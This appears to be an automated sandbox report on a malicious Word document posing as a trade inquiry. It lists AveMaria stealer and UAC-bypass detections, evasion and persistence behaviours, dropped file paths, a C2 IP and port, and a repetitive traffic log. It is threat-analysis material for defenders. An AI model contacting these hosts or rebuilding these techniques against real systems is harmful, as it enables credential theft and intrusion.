Windows Analysis Report
Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc

Overview

General Information

Sample Name: Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc
Analysis ID: 708250
MD5: 9bc102ffb0930f5dee65bde8e0ba6d89
SHA1: 37cac7507a6ad02a75d947a9bdfe115f2da8b71b
SHA256: 959837140aee207e9fd845a030881f9430364d2df8088845f5828579420b1717
Tags: doc
Infos:

Detection

AveMaria, UACMe
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (drops PE files)
Yara detected AntiVM3
Document exploit detected (creates forbidden files)
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Scheduled temp file as task from temp location
Yara detected UACMe UAC Bypass tool
Yara detected AveMaria stealer
Document contains OLE streams with names of living off the land binaries
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Powershell drops PE file
Adds a directory exclusion to Windows Defender
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Uses schtasks.exe or at.exe to add and modify task schedules
Drops PE files with benign system names
Microsoft Office creates scripting files
Office process drops PE file
Injects files into Windows application
Writes to foreign memory regions
Increases the number of concurrent connection per server for Internet Explorer
Bypasses PowerShell execution policy
Contains functionality to hide user accounts
Tries to download and execute files (via powershell)
Suspicious powershell command line found
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Found suspicious RTF objects
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
HTTP GET or POST without a user agent
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Binary contains a suspicious time stamp
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Internet Provider seen in connection with other malware
Yara detected Credential Stealer
Potential document exploit detected (performs DNS queries)
Enables debug privileges
AV process strings found (often used to terminate AV products)
Installs a raw input device (often for capturing keystrokes)
Detected TCP or UDP traffic on non-standard ports
Potential document exploit detected (performs HTTP gets)

Classification

AV Detection

barindex
Source: Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc ReversingLabs: Detection: 32%
Source: Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc Virustotal: Detection: 50% Perma Link
Source: Yara match File source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Roaming\eDdYRRbouy.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\explorer.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\explorer[1].exe Joe Sandbox ML: detected
Source: 8.2.explorer.exe.3a2b638.11.unpack Avira: Label: TR/AD.MortyStealer.utbzg
Source: 17.0.MSBuild.exe.400000.0.unpack Avira: Label: TR/Redcap.ghjpt
Source: 00000011.00000003.963762920.00000000006D8000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: AveMaria {"C2 url": "20.126.95.155", "port": 7800}

Exploits

barindex
Source: Yara match File source: 17.3.MSBuild.exe.6a5d90.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000003.964034718.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.964229410.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.957645359.000000000054F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 2360, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 2040, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 676, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 1248, type: MEMORYSTR
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Directory created: C:\Program Files\Microsoft DN1 Jump to behavior
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbment.Automation.pdbBB source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: :\Windows\mscorlib.pdbXr`g source: powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbment.Automation.pdbBB[xp source: powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.pdben source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: :\Windows\dll\mscorlib.pdbDr`g source: powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdbUy source: powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior

Software Vulnerabilities

barindex
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: explorer[1].exe.0.dr Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\explorer[1].exe Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
